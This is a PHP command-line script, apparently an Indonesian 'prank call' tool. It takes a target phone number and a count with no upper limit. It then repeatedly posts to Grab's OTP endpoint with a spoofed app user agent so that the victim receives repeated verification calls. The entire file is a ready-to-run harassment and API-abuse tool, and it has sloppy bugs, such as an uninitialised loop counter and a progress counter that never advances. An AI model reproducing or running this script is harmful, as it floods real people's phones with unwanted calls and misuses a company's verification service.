<?php
# Ahmad Khoirul Marzuqin
$n = "\e[0m"; # Normal
# Ahmad Khoirul Marzuqin
$c = "\e[90m"; # Coklat
# Ahmad Khoirul Marzuqin
$m = "\e[91m"; # Merah
# Ahmad Khoirul Marzuqin
$h = "\e[92m"; # Hijau
# Ahmad Khoirul Marzuqin
$k = "\e[93m"; # Kuning
# Ahmad Khoirul Marzuqin
$u = "\e[94m"; # Ungu
# Ahmad Khoirul Marzuqin
$p = "\e[95m"; # Pink
# Ahmad Khoirul Marzuqin
$b = "\e[96m"; # Biru
# Ahmad Khoirul Marzuqin
echo "$u             ╔════════════════════════╗
             ║$k Call     :$h Grab$u        ║
             ║$k Maksimal :$h Tanpa Batas$u ║
             ╚════════════════════════╝

╔═╗
║".$n."›".$u."║$k Nomor Target        :$h ";
# Ahmad Khoirul Marzuqin
$no = get();
# Ahmad Khoirul Marzuqin
$n = new prankCall($no);
# Ahmad Khoirul Marzuqin
$n->run();
# Ahmad Khoirul Marzuqin
function get(){
	return trim(fgets(STDIN));
}
class prankCall{
	public function __construct($no){
		$this->number = $no;
	}
	private function get(){
		return trim(fgets(STDIN));
	}
	private function correct($no){
		$cek = substr($no,0,2);
		if($cek=="08"){
			$no = "62".substr($no,1);
		}
		return $no;
	}
	private function ekse(){
		$no = $this->correct($this->number);
		$rand = rand(0123456,9999999);
		$rands = $this->randStr(12);
		$post = "method=CALL&countryCode=id&phoneNumber=$no&templateID=pax_android_production";
		$h[] = "x-request-id: ebf61bc3-8092-4924-bf45-$rands";
		$h[] = "Accept-Language: in-ID;q=1.0, en-us;q=0.9, en;q=0.8";
		$h[] = "User-Agent: Grab/5.20.0 (Android 6.0.1; Build $rand)";
		$h[] = "Content-Type: application/x-www-form-urlencoded";
		$h[] = "Content-Length: ".strlen($post);
		$h[] = "Host: api.grab.com";
		$h[] = "Connection: close";
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, "https://api.grab.com/grabid/v1/phone/otp");
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
		curl_setopt($ch, CURLOPT_HTTPHEADER, $h);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		$x = curl_exec($ch); curl_close($ch);
		$ekse = json_decode($x,true);
		if(empty($ekse['challengeID'])){
			echo "X\n";
		}else{
			echo "✓\n";
		}
	}
	private function loop($many,$sleep=null){
		$j=0;
		$no = $this->correct($this->number);
		while($a<$many){
			$rand = rand(0123456,9999999);
			$rands = $this->randStr(12);
			$post = "method=CALL&countryCode=id&phoneNumber=$no&templateID=pax_android_production";
			$h[] = "x-request-id: ebf61bc3-8092-4924-bf45-$rands";
			$h[] = "Accept-Language: in-ID;q=1.0, en-us;q=0.9, en;q=0.8";
			$h[] = "User-Agent: Grab/5.20.0 (Android 6.0.1; Build $rand)";
			$h[] = "Content-Type: application/x-www-form-urlencoded";
			$h[] = "Content-Length: ".strlen($post);
			$h[] = "Host: api.grab.com";
			$h[] = "Connection: close";
			$ch = curl_init();
			curl_setopt($ch, CURLOPT_URL, "https://api.grab.com/grabid/v1/phone/otp");
			curl_setopt($ch, CURLOPT_POST, 1);
			curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
			curl_setopt($ch, CURLOPT_HTTPHEADER, $h);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			$x = curl_exec($ch); curl_close($ch);
			$ekse = json_decode($x,true);
			if(empty($ekse['challengeID'])){
				continue;
			}else{
				$jp = $j+1;
				echo "\e[94m║\e[0m›\e[94m║\e[95m Mengirim Pesan Call :\e[96m $jp ✓\r";
				$a++;
			}
			if($sleep!=null) sleep($sleep);
			if($a>=$many) echo "\n\e[94m╚═╝\n";
		}
	}
	private function randStr($l){
		$data = "abcdefghijklmnopqrstuvwxyz1234567890";
		$word = "";
		for($a=0;$a<$l;$a++){
			$word .= $data{rand(0,strlen($data)-1)};
		}
		return $word;
	}
	public function run(){
			echo "\e[94m║\e[0m›\e[94m║\e[92m Jumlah Pesan Call   :\e[93m ";
			$many = $this->get();
			echo "\e[94m║ ║\n";
			$this->loop($many);
	}
}
# Ahmad Khoirul Marzuqin